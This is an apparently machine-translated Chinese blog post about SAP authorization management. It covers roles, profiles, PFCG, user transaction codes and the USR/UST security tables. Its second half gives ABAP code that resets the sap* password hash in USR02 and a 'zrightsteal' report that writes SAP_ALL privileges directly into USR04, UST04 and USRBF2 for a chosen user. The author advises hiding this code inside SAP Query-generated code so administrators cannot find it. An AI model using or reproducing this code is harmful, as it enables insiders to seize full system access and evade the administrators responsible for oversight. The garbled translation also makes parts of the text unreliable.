"IT168 informatization"
Generally, basis will use PFCG to do privilege management, and when you save it will produce a system profile name,
Remember SU01 when the user has profile and role two fields? What about their relationship?
First understand a few concepts.
1.activity
Let's just say we start with activity, what does activity mean, you check it out.
The dictionary also knows, is the stipulation can do what action, for example cannot smoke can only drink, cannot more than 22,
No, this is what my wife said, SAP is not like this, is only inserts, Update,display or something.
These things were written in the Tobj table by the Germans.
Activity can also be divided into activity group.
2.activity Category &authorization Group
Role Vs Profile
If you look at the T020, you'll know what K,d, A, M or something.
What is profile? It can actually be understood as all authorization data (there are a lot of authorization group--{you can use OBA7 to fill out,
Permission too thin is not a good thing ^_^} and activity consist of a set of names, usually a custom role-producing
Give birth to a PROFILE,SAP authority control is based on authorization data (objects) in profile.
What role is it? Role is just a name, and then give profile to it, such as you SU01 build a
User, I don't have any role, but add like Sap_all profile
It can do anything.
SAP itself has many default role & profiles.
3. The most commonly used PFCG
->authorizations->change Authorization data->
After entering, select selection criteria to see all authorization object
Manually can manually add authorization object, such as you use a T-code permission error, ABAP use SU53 check
Know which authorization objec is missing, and then hand it in.
You choose to authorization levels, you can subdivide the permissions by the account type.
Some even go directly to a table field. And you can even? An object allocates buffer buffer.
So how does SAP control the rights, the Butcher will use a knife small slaughter.
4. Several t-code on the mandate.
A Role (roles) related t-code:
PFAC Standard
PFAC_CHG Change
Pfac_del Delete
Pfac_dis Display
Pfac_ins New
Pfac_str
PFCG Create
ROLE_CMP comparison
SUPC Bulk Build Character profile
Swuj Test
SU03 Detection authorzation Data
SU25, SU26 Check updated profile
(ii) Establishment of user-related t-code:
SU0
SU01
su01d
Su01_nav
SU05
SU50, Su51, SU52
SU1
SU10 Batch
SU12 Batch
Sucomp: Maintain user company address
SU2 change user parameters
Suim User Information System
User Group
SUGR: Maintenance
SUGRD: Show
Sugrd_nav: or the maintenance
Sugr_nav: or the display
(iii) About Profile&authoraztion Data
The code is as follows |
Copy Code |
SU02: Create profile directly without role SU20: Subdivision Authorization Fields SU21 (SU03):* * * * * Maintenance Authorization Objects (TOBJ,USR12). For vouchers you can subdivide to: F_bkpf_bed:accounting Document:account Authorization for Customers F_bkpf_bek:accounting Document:account Authorization for vendors F_bkpf_bes:accounting document:account Authorization for g/l Accounts F_bkpf_bla:accounting document:authorization for Document Types F_bkpf_buk:accounting Document:authorization for company codes F_bkpf_bup:accounting document:authorization for Posting periods F_bkpf_gsb:accounting document:authorization for Business Areas F_bkpf_koa:accounting document:authorization for Account Types F_bkpf_vw:accounting document:change Default Values for Doc.type/psky And then you go in and you can subdivide, these things are save in the USR12 table. The DB layer is utab. For specific transaction code subdivision: Su22,su24 su53:*** is that you make a mistake to check without those authoraztion objects. SU56: Analyze authoraztion data buffers. SU87: Used to check the history generated by user changes SU96,SU97,SU98,SU99: What are you doing? SUPC: Bulk Production role DB and Logical layers: Sukri:transaction combinations Critical for security Tables Tobj:all avaiable authorzation objects. (All here) USR12: User-level Authoraztion value ----------------------------- USR01: Master Data USR02: The password is here USR04: Authorize this Usr03:user Address Data Usr05:user Master Parameter ID Usr06:additional Data per User Usr07:object/values of authorization check that failed Usr08:table for user menu entries Usr09:entries for user menus (work areas) Usr10:user Master Authorization Profiles Usr11:user Master texts for Profiles (USR10) Usr12:user Master Authorization values Usr13:short Texts for authorizations Usr14:surchargeable Language versions per User Usr15:external User Name Usr16:values for Variables for User authorizations Usr20:date of last User master reorganization Usr21:assign User name address key Usr22:logon Data without kernel access Usr30:additional Information for User Menu Usr40:table for illegal passwords USR41: Current User Usrefus: USRBF2 USRBF3 Ust04:user profile Here Ust10c:composite Profiles Ust10s:single profiles (role corresponding) Ust12:authorizations |
..............................
How to Steal permissions
..............................
User:
The code is as follows |
Copy Code |
User type: The usual user types are A.dialog (normal user) B.communication C.system D.service E.reference. |
Usually you will have permission to test before using any t-code.
Authority_check: This function is just a small check to see if your user is there, and when it expires.
* * If coding only use this function is enough.
Authority_check_tcode: Check T-code
This z function is really checking autorization objects.
The code is as follows |
Copy Code |
Susr_user_auth_for_obj_get: A Uthorization_data_read_selobj:
|
------------------------------------------
The sap* password is changed to 123 program, very simple.
We found the user logon form USR02.
The code is as follows |
Copy Code |
(Df52478e6ff90eeb is stored in DB through SAP encryption, password encryption of SAP?) The zmodsap*. Data zUSR02 like USR02. Select Single * to zUSR02 from USR02 where bname = ' sap* '. Zusr02-bcode = ' Df52478e6ff90eeb '. Update USR02 from zUSR02. |
Now the question is how to make your basis do not find, very simple, the code hidden in query, is that you do a
Query,query is going to generate code, and then you add it, who can think of??? And then you wait for your basis to cry ...
It's too vicious to do it. or secretly engage their own users.
You have to be very clear about the authority structure here.
Permissions are related to three tables.
The code is as follows |
Copy Code |
a.usr04 b.usr04 c.usrbf2 This table corresponds to the Authorzization objects used. br> *&---------------------------------------------------------------------* *& report:steal SAP All right * *& Creation date:2004.04.01 * *& Created by:Stone.Fu * *& Description: Can steal SAP all permissions * & nbsp *& Modified date:2005.11.02 *& Description: Put this code hide in the in-painter or query code * *&---------------------------------------------------------------------* zrightsteal. data zUSR04 like USR04. "???????? Work area?? data zUST04 like USR04. data zprofs like Usr04-profs. Data ZUSRBF2 like USRBF2 occurs 0 with header line. "USRBF2????? Internal Table * * Update Authorization table USR04. Select Single * to zUSR04 from USR04 where bname = ' ZABC2 '. SAP All permissions move ' C sap_all ' to Zprofs. zusr04-nrpro = ' 14 '. zusr04-profs = zprofs. Update USR04 from zUSR04. **update User Authorization Masters table UST04. Select Single * to zUST04 from UST04 where bname = ' ZABC2 '. Zust04-profile = ' Sap_all '. The SAP all permissions Update UST04 from zUST04. *????? Insert *zust04-mandt = ' 200 '. *zust04-bname = ' ZABC2 '. *zust04-profile = ' Sap_all '. *insert UST04 from ZUST04. SELECT * from USRBF2 into table ZUSRBF2 where bname = ' sap* '. Loop at ZUSRBF2. Zusrbf2-bname = ' ZABC2 '. Modify ZUSRBF2 INDEX Sy-tabix transporting bname. Endloop. INSERT USRBF2 from TABLE ZUSRBF2 accepting DUPLICATE KEYS. |
Build yourself a ztest user does not give it any permissions and then run report zrightsteal on test machine.
Then Ztest is Sap_all, and then you hide the code in SQP query's code. Abapcode is too easy to find.